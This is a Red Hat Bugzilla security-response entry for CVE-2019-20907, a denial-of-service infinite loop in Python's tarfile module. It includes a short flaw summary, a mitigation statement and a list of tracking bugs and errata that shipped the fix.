Bug 1856481 (CVE-2019-20907)
Summary: | CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Guilherme de Almeida Suckevicz <gsuckevi> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | unspecified | CC: | adev88, bdettelb, carl, charleryals, cstratak, dmalcolm, extras-orphan, hhorak, jeffrey.ness, jorton, kevin, manisandro, m.cyprian, mhroncok, pviktori, python-maint, python-sig, rkuska, shcherbina.iryna, slavek.kabrda, steve.traylen, thrnciar, TicoTimo, tomckay, tomspur, torsava, tvainio, vstinner |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | If docs needed, set a value | |
Doc Text: |
A flaw was found in python. In Lib/tarfile.py an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
|
Story Points: | --- |
Clone Of: | Environment: | ||
Last Closed: | 2020-10-19 20:21:20 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 1856482, 1856483, 1856484, 1856485, 1856486, 1856488, 1856489, 1856490, 1856491, 1856492, 1856493, 1856536, 1856537, 1856538, 1856539, 1856540, 1856541, 1856542, 1856543, 1856544, 1856545, 1856546, 1856647, 1856648, 1856649, 1856650, 1856651, 1856652, 1882666, 1885296, 1916667, 1916668, 1916669 | ||
Bug Blocks: | 1856487 |
Description
Guilherme de Almeida Suckevicz
2020-07-13 18:33:53 UTC
Created mingw-python3 tracking bugs for this issue: Affects: fedora-all [bug 1856489] Created python2 tracking bugs for this issue: Affects: fedora-all [bug 1856485] Created python26 tracking bugs for this issue: Affects: fedora-all [bug 1856486] Created python3 tracking bugs for this issue: Affects: fedora-all [bug 1856488] Created python34 tracking bugs for this issue: Affects: epel-all [bug 1856483] Affects: fedora-all [bug 1856491] Created python35 tracking bugs for this issue: Affects: fedora-all [bug 1856490] Created python36 tracking bugs for this issue: Affects: fedora-all [bug 1856492] Created python37 tracking bugs for this issue: Affects: fedora-all [bug 1856493] Created python38 tracking bugs for this issue: Affects: fedora-all [bug 1856484] Created python39 tracking bugs for this issue: Affects: fedora-all [bug 1856482] Mitigation: This flaw can be mitigated by not opening untrusted files with tarfile. Statement: A service is vulnerable if it uses python's tarfile module to open untrusted tar files. If an attacker is able to submit a crafted tar file to a service which uses the tarfile module to open it, an infinite loop will be executed, potentially causing a denial of service. The tarfile module is included with python. Flaw summary: In Lib/tarfile.py's _proc_pax() function, there's a while True loop which relies upon the value of the pos variable in order to exit the loop. This variable is incremented with `pos += length` but it's possible for length to be 0, thus the loop will never exit. It's possible for length to be set to 0 because the function uses regex to parse the length like: (length, keyword, value). The patch raises an exception if the length variable is 0 and adds a test. Tomas, Joshua, is the updated summary of all the bugzillas scripted? Can the script be updated to use the *This is a minor update (do not send email)* option? This issue has been addressed in the following products: Red Hat Software Collections for Red Hat Enterprise Linux 6 Red Hat Software Collections for Red Hat Enterprise Linux 7 Red Hat Software Collections for Red Hat Enterprise Linux 7.6 EUS Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS Via RHSA-2020:4285 https://access.redhat.com/errata/RHSA-2020:4285 This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2019-20907 This issue has been addressed in the following products: Red Hat Software Collections for Red Hat Enterprise Linux 7 Red Hat Software Collections for Red Hat Enterprise Linux 7.6 EUS Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS Via RHSA-2020:4273 https://access.redhat.com/errata/RHSA-2020:4273 This issue has been addressed in the following products: Red Hat Software Collections for Red Hat Enterprise Linux 7 Red Hat Software Collections for Red Hat Enterprise Linux 7.6 EUS Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS Via RHSA-2020:4299 https://access.redhat.com/errata/RHSA-2020:4299 This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2020:4433 https://access.redhat.com/errata/RHSA-2020:4433 This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2020:4641 https://access.redhat.com/errata/RHSA-2020:4641 This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2020:4654 https://access.redhat.com/errata/RHSA-2020:4654 This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Via RHSA-2020:5009 https://access.redhat.com/errata/RHSA-2020:5009 This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Via RHSA-2020:5010 https://access.redhat.com/errata/RHSA-2020:5010 This issue has been addressed in the following products: Red Hat Enterprise Linux 7.7 Extended Update Support Via RHSA-2021:0528 https://access.redhat.com/errata/RHSA-2021:0528 This issue has been addressed in the following products: Red Hat Enterprise Linux 7.4 Advanced Update Support Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions Red Hat Enterprise Linux 7.4 Telco Extended Update Support Via RHSA-2021:0761 https://access.redhat.com/errata/RHSA-2021:0761 This issue has been addressed in the following products: Red Hat Enterprise Linux 7.6 Extended Update Support Via RHSA-2021:0881 https://access.redhat.com/errata/RHSA-2021:0881 |